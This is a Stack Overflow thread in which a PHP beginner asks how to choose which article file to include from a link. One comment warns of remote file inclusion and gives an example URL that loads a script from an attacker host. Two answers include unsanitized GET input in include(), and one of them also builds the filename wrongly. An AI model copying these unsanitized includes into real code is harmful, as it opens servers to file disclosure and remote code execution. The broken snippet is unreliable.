0

I'm sure that I use a wrong way but it's my first attempt to use php. The next code doesn't work. The variable $file is defined locally but I don't know how to use a global variable.

articles.php In this file I have a list :

<ol>
  <li><a <?php $file="a.php"; ?> href="article.php" > title 1 </a>  </li>
  <li><a <?php $file="b.php"; ?> href="article.php" > title 2  </a>  </li>
</ol>

article.php in this file I want to use this

  <?php   include("articles/$file"); ?>

How to define correctly $file ? Is there a better way to load a.php and b.php ?

Improve this question
1
  • 1
    be extraordinarily careful with this kind of code. right now, if this code was working, it'd open your server to a TOTAL and TRIVIALLY EASY remote compromise. e.g. http://example.com?file=http://malicioussite.com/attack_script.php and poof... you're executing a script of the attacker's choice. The articles/ portion is a MINOR defense, but still allows an attacker to load up and display ANY file on your system that they know the full path for. Commented Feb 28, 2013 at 21:51

4 Answers 4

Reset to default
3

You can do something like this:

articles.php

<ol>
  <li><a href="article.php?page=a" > title 1 </a></li>
  <li><a href="article.php?page=b" > title 2  </a></li>
</ol>

This will pass the variable page to article.php.

article.php

if( $_SERVER[REQUEST_METHOD] == 'GET' && !empty($_GET[page]) ) {
    $path = $_GET[page] . ".php"; // transform into a filename (a.php)

    if( file_exists($path) ) {
        include_once $path;
    }
}

Here, you will check if the requested method is GET and if the page variable is not empty. You then add .php to the variable to make it a complete file name and check if it exists. If it does, it will be included. Word of caution, this is not sanitized. You can add an array of acceptable file names and iterate through those to check if they're valid.

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

Thanks! I need to try your code and to try to understand the differences with others answers.
The security seems to be very important with this kind of code. I need to study how to define an array of acceptable file names and how to use it.
2

Pass it with e.g. $_GET:

<ol>
  <li><a href="article.php?f=a" > title 1 </a>  </li>
  <li><a href="article.php?f=b" > title 2  </a>  </li>
</ol>

Including any file without a sanity check is highly insecure. I would suggest to do it with a white list:

$file = $_GET['f'];
switch ($file){
   case 'a':
   case 'b':
      include('articles/'.$file.'.php');
      break;
   default:
      // don't do anything
}

HTH

Improve this answer

2 Comments

Thanks for the switch idea but I don't understand the link between "sanity check" , "white list" and "switch".
if you get e.g. a 'c' as parameter it does not try to include it, because it is not on your whitelist a, b done with the cases in the switch.
2

You are doing it wrong.

Every php file execution is like separate application execution on server. Server forgets all variables after code is executed and page is sent to browser. You can't pass data from one page to other just like that.

To pass some value to next page you have to use one of these methods:

  • POST or GET
  • Cookie
  • Session

PHP web applications are very specyfic in that matter, and you have to learn this perfectly if you want to write web apps in PHP.

More information here:

PHP Pass variable to next page

Improve this answer

1 Comment

Yes I understand that I used a wrong way. Your answer helps me to understand the other answers.
1

You probably trying to do something like this (this is passing some value via HTTP GET).

Page 1 (page1.php) - contains link with parameter file with value page3

<a href="page2.php?file=page3">

Page 2 (page2.php) - page supposed to be opened with "file" parameter in URL

<?php
    $file = $_GET["file"]; // takes parameter "file" from URL
    include($file."php");  // Dot is used for "adding" strings
?>

Page 3 (page3.php) - test page to include

<?php
    echo "This is included page3.php!"
?>

Consider this as simplest possible code for learning. There are many things to do in real application.

"In real world" you have to check (by using IF statement):

  1. If file was called with GET request ($_SERVER[REQUEST_METHOD] == 'GET')
  2. if there was parameter in url !empty($_GET['file'])
  3. If file with name provided in URL exists file_exists($file."php")

to avoid PHP fatal errors, when someone write URL to your page2.php manually, without parameter or with wrong filename.

Aarolama Bluenk wrote answer with these necessary things to do (see below/above).

Improve this answer

3 Comments

Interesting because this code looks simple. Do you know a good manual or site to understand how to manage pages with html and php ? It's necessary to understand the differences between the answers.
I do. You may visit thenewboston.org or phpacademy.org very good video tutorials for PHP and other languages.
I added some additional information why my script is so simple (at the end of answer).

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.